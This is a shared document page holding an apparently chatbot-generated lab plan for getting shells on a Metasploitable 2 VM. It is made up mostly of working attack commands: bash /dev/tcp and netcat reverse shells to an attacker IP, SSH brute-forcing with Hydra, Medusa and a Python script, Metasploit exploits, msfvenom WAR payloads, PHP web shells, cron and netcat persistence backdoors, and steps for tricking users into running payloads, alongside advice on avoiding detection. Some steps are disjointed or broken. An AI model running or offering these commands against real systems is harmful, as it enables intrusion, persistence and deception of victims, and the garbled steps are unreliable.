Gallery
Share
Explore

explotation of linux and windows

Here’s a detailed command-oriented lab plan focusing exclusively on shell exploitation via two methods:
User Involvement (e.g., phishing, weak credentials).
No User Involvement (exploiting services and backdoors).

Lab Objective:

Gain shells on the Metasploitable 2 system through interactive and non-interactive methods.

1. Environment Setup

Ensure both Kali Linux (attacker) and Metasploitable 2 (target) are on the same network. Use their IP addresses for exploitation.
ping [Metasploitable 2 IP]

2. Gaining Shell Access via User Interaction

Step 1: Exploiting FTP with Weak Credentials

Manual Connection:

ftp [Metasploitable 2 IP]
# Login using default credentials (e.g., msfadmin:msfadmin)

Download Payload via FTP:

ftp [Metasploitable 2 IP]
put reverse_shell.sh

Execute Payload:

bash reverse_shell.sh

Brute-forcing SSH passwords using a wordlist can be done with tools such as Hydra, Medusa, or Nmap scripts. Here’s how you can accomplish this, assuming you have permission for such activities as part of a penetration testing scenario.

1. Using Hydra

Hydra is a powerful tool for brute-forcing various protocols, including SSH.

Command:

hydra -l <username> -P <path_to_password_list> ssh://<target_ip>

Example:

hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.25.133

Parameters:

-l: Specifies the username to test.
-P: Specifies the path to the password list.
ssh://<target_ip>: Specifies the SSH protocol and target IP.

Brute-Force Both Username and Password:

If you want to brute force both the username and password:
hydra -L <path_to_username_list> -P <path_to_password_list> ssh://<target_ip>

Example:

hydra -L usernames.txt -P passwords.txt ssh://192.168.25.133

2. Using Medusa

Medusa is another fast brute-forcing tool.

Command:

medusa -h <target_ip> -U <path_to_username_list> -P <path_to_password_list> -M ssh

Example:

medusa -h 192.168.25.133 -U usernames.txt -P passwords.txt -M ssh

Parameters:

-h: Target IP or hostname.
-U: Path to the username list.
-P: Path to the password list.
-M ssh: Specifies the SSH module.

3. Using Nmap Scripting Engine (NSE)

Nmap's scripting engine includes a script for brute-forcing SSH credentials.

Command:

nmap --script ssh-brute --script-args userdb=<path_to_username_list>,passdb=<path_to_password_list> -p 22 <target_ip>

Example:

nmap --script ssh-brute --script-args userdb=usernames.txt,passdb=passwords.txt -p 22 192.168.25.133

Parameters:

userdb: Path to the username list.
passdb: Path to the password list.
-p 22: Specifies the SSH port (default is 22).

4. Using a Custom Python Script

If you prefer scripting your brute-force attack, you can use Python with the paramiko library.

Example Script:

import paramiko

def ssh_brute_force(target_ip, username, password_list):
for password in password_list:
try:
print(f"Trying {username}:{password}")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target_ip, username=username, password=password, timeout=5)
print(f"Success: {username}:{password}")
ssh.close()
return
except paramiko.AuthenticationException:
continue
except Exception as e:
print(f"Error: {e}")
break

target_ip = "192.168.25.133"
username = "msfadmin"
password_list = open("passwords.txt").read().splitlines()

ssh_brute_force(target_ip, username, password_list)

Run:

python3 ssh_brute_force.py

5. Using Metasploit

Metasploit Framework has a built-in module for SSH brute-forcing.

Steps:

Start Metasploit:
msfconsole

Load the SSH login module:
use auxiliary/scanner/ssh/ssh_login

Set the required options:
set RHOSTS 192.168.25.133
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
set THREADS 5

Run the attack:
run

6. Using John the Ripper

If you have an SSH private key file that is password-protected, you can brute-force its passphrase.

Command:

john --wordlist=<path_to_wordlist> <ssh_private_key_file>

Example:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa

Additional Notes

Ethical Use: Ensure you have explicit permission to perform brute-forcing on the target system.
Adjust Speed: Use threads responsibly (-t in Hydra, -T in Medusa) to avoid locking out the target or overloading the system.
Avoid Detection: Use stealth techniques to minimize detection by intrusion detection/prevention systems (IDS/IPS).
Legality: Unauthorized brute-forcing is illegal and unethical.
Let me know if you need further clarification or assistance!


Generate Reverse Shell Script:


echo "bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > reverse_shell.sh
nc 192.168.25.77 4444 -e sh

Step 2: SSH Login with Weak Credentials

Manual Connection:

ssh msfadmin@[Metasploitable 2 IP]
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa msfadmin@192.168.25.133

Upload and Execute Shell Payload via SSH:

scp reverse_shell.sh msfadmin@[Metasploitable 2 IP]:/tmp
ssh msfadmin@[Metasploitable 2 IP] 'bash /tmp/reverse_shell.sh'

Step 3: Exploit Telnet Service

Manual Connection:

telnet [Metasploitable 2 IP]
# Login with weak credentials (e.g., msfadmin:msfadmin)

Upload and Execute Payload:

echo "bash -i >& /dev/tcp/[Your IP]/5555 0>&1" > /tmp/telnet_reverse.sh
bash /tmp/telnet_reverse.sh

3. Gaining Shell Access Without User Involvement

Step 1: Exploit vsftpd Backdoor (Port 21)

Metasploit Exploit:

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST [Metasploitable 2 IP]
run

Confirm Shell:

whoami
hostname

Step 2: Exploit Samba Usermap Script

Metasploit Exploit:

msfconsole
use exploit/multi/samba/usermap_script
set RHOST [Metasploitable 2 IP]
set PAYLOAD cmd/unix/reverse
set LHOST [Your IP]
set LPORT 4444
run

Step 3: Tomcat Manager Backdoor

Upload WAR File for Reverse Shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=4444 -f war -o shell.war

curl -u tomcat:tomcat -T shell.war http://[Metasploitable 2 IP]:8080/manager/text/deploy?path=/shell

Trigger Shell:

curl http://[Metasploitable 2 IP]:8080/shell

Step 4: Remote Code Execution via MySQL

Login to MySQL:

mysql -u root -p -h [Metasploitable 2 IP]

Run System Commands via MySQL:

SELECT system('bash -i >& /dev/tcp/[Your IP]/4444 0>&1');

Step 5: Using Netcat Listener for Backdoor

Create Persistent Backdoor:

On Metasploitable 2:
echo "nc -lvp 5555 -e /bin/bash" > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh
nohup bash /tmp/backdoor.sh &

Connect to Backdoor:

On your machine:
nc [Metasploitable 2 IP] 5555

Step 6: Exploit PostgreSQL Command Execution

Connect to PostgreSQL:

psql -h [Metasploitable 2 IP] -U postgres

Run Reverse Shell Command:

CREATE OR REPLACE FUNCTION runcmd() RETURNS void AS $$
DECLARE
result TEXT;
BEGIN
result := system('bash -i >& /dev/tcp/[Your IP]/5555 0>&1');
END;
$$ LANGUAGE plpgsql;
SELECT runcmd();

Step 7: Multi-Handler Shell Listener

Setup Multi-Handler:

msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [Your IP]
set LPORT 5555
run

These methods focus on gaining shells interactively (via weak credentials) and non-interactively (via exploits and backdoors). Would you like further customization for specific services or payloads?
Here’s an extended list with additional methods for shell exploitation using both user involvement and no user involvement techniques on Metasploitable 2. The aim is to include diverse services, exploits, and creative ways to gain a shell.

1. User Involvement Exploitation

Exploiting Weak Web Credentials

Upload Reverse Shell via PHPMyAdmin

Log in to http://[Metasploitable 2 IP]/phpmyadmin with default credentials (root:root).
Execute the following SQL command to write a PHP reverse shell:
CREATE TABLE cmd_shell (cmd BLOB);
INSERT INTO cmd_shell VALUES ('<?php system($_GET["cmd"]); ?>');

Access the shell:
curl "http://[Metasploitable 2 IP]/uploads/shell.php?cmd=bash -i >& /dev/tcp/[Your IP]/4444 0>&1"

Social Engineering via Malicious Script

Crafting a Bash Reverse Shell Script

Create a script and host it using Python’s HTTP server:
echo "bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > shell.sh
python3 -m http.server 8000

Convince the user to download and execute the script:
wget http://[Your IP]:8000/shell.sh
bash shell.sh

Netcat Listener Combined with User Input

Upload Backdoor via Simple User Commands

Trick the user to run:
echo "nc -e /bin/bash [Your IP] 5555" > /tmp/user_backdoor.sh
bash /tmp/user_backdoor.sh

2. Exploitation Without User Involvement

Exploit WebDAV Misconfiguration

Enable WebDAV File Uploads

Check for WebDAV service:
davtest -url http://[Metasploitable 2 IP]/webdav/

Upload a reverse shell:
cadaver http://[Metasploitable 2 IP]/webdav/
put shell.php

Trigger the shell:
curl http://[Metasploitable 2 IP]/webdav/shell.php

Backdoor via Cron Jobs

Inject Reverse Shell Command

Add a malicious cron job:
echo "* * * * * bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > /tmp/crontab.txt
crontab /tmp/crontab.txt

Exploitation of Apache Mod_CGI

Shellshock Vulnerability

Use Metasploit to exploit the Bash environment variable injection:
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST [Metasploitable 2 IP]
set TARGETURI /cgi-bin/test.cgi
set PAYLOAD cmd/unix/reverse
set LHOST [Your IP]
set LPORT 4444
run

Exploiting RPC Services

Metasploit RPC Exploit

Exploit RPC service with Metasploit:
msfconsole
use exploit/linux/samba/setinfopolicy_heap
set RHOST [Metasploitable 2 IP]
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST [Your IP]
set LPORT 4444
run

Exploiting Apache Tomcat Service

Deploy JSP Reverse Shell

Create a JSP payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=4444 -f raw > shell.jsp

Deploy the shell:
curl -u tomcat:tomcat -T shell.jsp http://[Metasploitable 2 IP]:8080/manager/text/deploy?path=/shell

Trigger the shell:
curl http://[Metasploitable 2 IP]:8080/shell

Exploiting TFTP

Inject a Malicious Config File

Upload a malicious TFTP config:
tftp [Metasploitable 2 IP]
put reverse_shell.sh

Execute the uploaded script:
bash reverse_shell.sh

SMB Relay Attack

Use Metasploit to Relay Attack

Exploit SMB with Metasploit:
msfconsole
use auxiliary/server/capture/smb
Want to print your doc?
This is not the way.
Try clicking the ⋯ next to your doc name or using a keyboard shortcut (
CtrlP
) instead.